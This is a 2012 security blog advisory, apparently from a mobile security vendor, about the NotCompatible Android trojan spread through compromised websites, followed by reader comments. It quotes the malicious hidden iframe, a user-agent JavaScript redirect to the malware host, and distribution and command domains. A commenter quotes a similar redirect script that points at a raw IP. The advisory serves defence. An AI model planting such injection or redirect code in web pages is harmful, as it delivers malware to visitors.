May 2, 2012

UPDATE: Security Alert: Hacked Websites Serve Suspicious Android Apps (NotCompatible)

Update Two: Based on our current research,  NotCompatible is a new Android trojan that appears to serve as a simple TCP relay / proxy while posing as a system update. This threat does not currently appear to cause any direct harm to a target device, but could potentially be used to gain illicit access to private networks by turning an infected Android device into a proxy. As previously mentioned, this appears to be the first time that compromised websites have been used to distribute malware targeting Android devices.

Distribution of NotCompatible depends on compromised websites that have a hidden iframe at the bottom of each page. If a user visits a compromised website from an Android device, their mobile web browser will automatically begin downloading the NotCompatible application, named ‘Update.apk’. Like any drive-by downloads, a user needs to install the downloaded application before a device will be infected. Based on our initial investigation, we’ve confirmed that a number of websites have been compromised. However, affected sites appear to show relatively low traffic and we expect total impact to Android users to be low.

This specific sample, while relatively well constructed, does not appear to go to great lengths to hide its intended purpose: it can be used to access private networks. This feature in itself could be significant for system IT administrators: a device infected with NotCompatible could potentially be used to gain access to normally protected information or systems, such as those maintained by enterprise or government.

Update: All Lookout users are currently protected against NotCompatible.  Lookout protects users from drive-by downloads when the features File System Monitoring and Install Monitoring are active.  These additional layers of protection alert users to known threats when they are downloaded to device storage, such as the /Downloads folder on the SD Card, and immediately before they are installed via sideloading.

Hacked websites are frequently used to infect PCs with malware; however, today we have identified the first time hacked websites are being used to specifically target mobile devices.  Lookout is in the process of rolling out an update to protect against the new threat,  NotCompatible.

How it Works

In this specific attack, if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application—this process is commonly referred to as a drive by download.

When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app.  In order to actually install the app to a device, it must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”).  If the device does not have the unknown sources setting enabled, the installation will be blocked.

(Screenshots originally posted by redditor, Georgiabiker)

Technical details

Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.

When a PC-based web browser accesses the site at gaoanalitics.info, a not found error is returned; however, if a web browser with the word “Android” in its user-agent header accesses the page, the following is returned:

<html><head></head><body><script  type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>

This page causes the browser to immediately attempt to access the page at androidonlinefix.info.  Like the previous site, only browsers sending an Android User-agent string will trigger a download (all other browsers will show a blank page).  When visiting this page from an Android browser, the server returns an android application, causing an Android browser to automatically download it.

Suspicious applications are currently served from the following sites:

  • gaoanalitics.info
  • androidonlinefix.info

Command and Control (C&C) domains include:

  • notcompatibleapp.eu

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.  As Lookout identifies the extent of infected websites, we will update this blog post.

The Lookout security team is actively investigating the infected websites and suspicious application.  Refer back to this blog post for regular updates on this security alert.

17 comments
  1. Leonidas says:

    thanks for the warning, will be alert

  2. Chris says:

    The app is good, up until today I always recommended this app to all of my users, friends, and colleagues (I work in IT). However, after a very disturbing discovery and then almost offensive response from customer service, I will be exploring other options for my mobile security (as well as recommending to everyone they avoid Lookout) since most of the people I deal with need to protect multiple mobile devices and Lookout only protects 2 devices. As if this short-sightedness were not enough, your customer service department’s (as represented by one Yvette Kay) only suggestion as a palliative until if/when your correct this is to purchase a 2nd Premium account. This within 5 minutes of my CC being charged for my 6 month membership ($29.99). As an IT professional, I am utterly appalled at this, and am hoping this blatant evidence of such a noncaring, mercenary attitude is not representative of your company’s attitude towards us as users, and I pray someone contacts me to resolve this as expeditiously as possible.

    Chris

  3. Expert says:

    Initially, while reading your bolg post, I was very interested to see how drive-by downloads migrated to Android. Unfortunately, it seems your terminology is somewhat disconnected from reality. A drive-by download denotes the installation of malware without the user’s interaction or consent as a consequence of the mere visit of a web site. What you are describing is more in line with threats such as Fake AV and the like, where the user is persuaded through social engineering to voluntarily install malware on their device. The security industry would be ill-advised using the term drive-by download for such social engineering attacks, as these are harder to defend against (from a technology standpoint at least).

  4. Tony says:

    Surely i am gonna buy all of your packages now! so scared!!

  5. Bob says:

    What does one do if it has already been downloaded and installed? Can you just un install it, and you’ll be safe again, or what would you recommend?

  6. Francis Turner says:

    This appears to be linked to the “Russian Business Network” cyber criminal gang(s). The androidonlinefix.info domain resolves to two IP addresses that are known to be associated with this network and the gaoanalitics.info one resolves to an address in Ukraine which isn’t known to be associated but which is hosted in an ASN that has other known RBN hosts on it.

    I blogged a little about this at our blog – http://blog.threatstop.com/2012/05/03/threatstop-blocks-android-malware-drive-by/

  7. Adel Ka says:

    Thanks for the useful post.
    In update two, you said “Like *any* drive-by downloads, a user needs to install the downloaded application before a device will be infected.”. In this case, user interaction is needed. But generally Drive-by download attacks occur silently, whit no user interaction.

  8. ExploitTheMedia says:

    “Like any drive-by downloads, a user needs to install the downloaded application before a device will be infected” … really?

    So, let me get this straight … I have to configure my android device to allow installs from 3rd-party soures, AND I have to tell the package installer to execute before I’m infected. Seems to be a bit of a distortion of the definition of a drive-by if you ask me.

  9. Rippidip says:

    Does this affect all browsers on Android (Dolphin, Firefox, Chrome, “Robot” etc.) or just the stock browser?

  10. […] by confidence association Lookout Mobile Security on a series of webistes, a decidedly peculiar “NotCompatible” Trojan is distributed regulating a web page containing a dark […]

  11. jhon says:

    Security is most important issue in mobile for using internet service.Android has upload a security service,of course it is essential for safety purpose.Thank for service.

  12. George says:

    Ya I am also repeating the same question does it affect the all sites or it’s depend on the site strength?

  13. Wim Rijksen says:

    I got a mail with no subject today, addressed to a bunch of people, containing only a URL: http://www.adheijnehengelo.nl/wp-content/plugins/zaeuxuoueen/biokrls.html?aba=shxaps
    Opening this on my Android device, it downloaded update.apk, which I did not install.
    The document (biokrls.html) contained this:

    if(navigator.userAgent.toLowerCase().indexOf(“android”) > -1) { top.location = ‘http://194.60.242.54/goo/’; }

    You are here because one of your friends have invited you.
    Page loading, please wait….

  14. internet security says:

    Somebody essentially assist to make critically posts I’d state. This is the first time I frequented your website page and thus far? I surprised with the analysis you made to make this actual publish extraordinary. Magnificent process!

  15. Melvin Davenport says:

    This message was seen as part of a routine planted on my laptop. The message came after my unit was off for some days. No activity was possible after this message was seen only restarts followed. Please tell me how to protect against this trojan/virus. My Windows 8 had to be wiped along with my data. Feel free to contact
    for more info and I will try to pass on what I experienced to Microsoft and others like AVG.

  16. Howdy! Do you know if they make any plugins to help with Search Engine Optimization?
    I’m trying to get my blog to rank for some targeted keywords
    but I’m not seeing very good gains. If you know of any please
    share. Cheers!

    my web blog: fb ads cracked reloaded

Leave a comment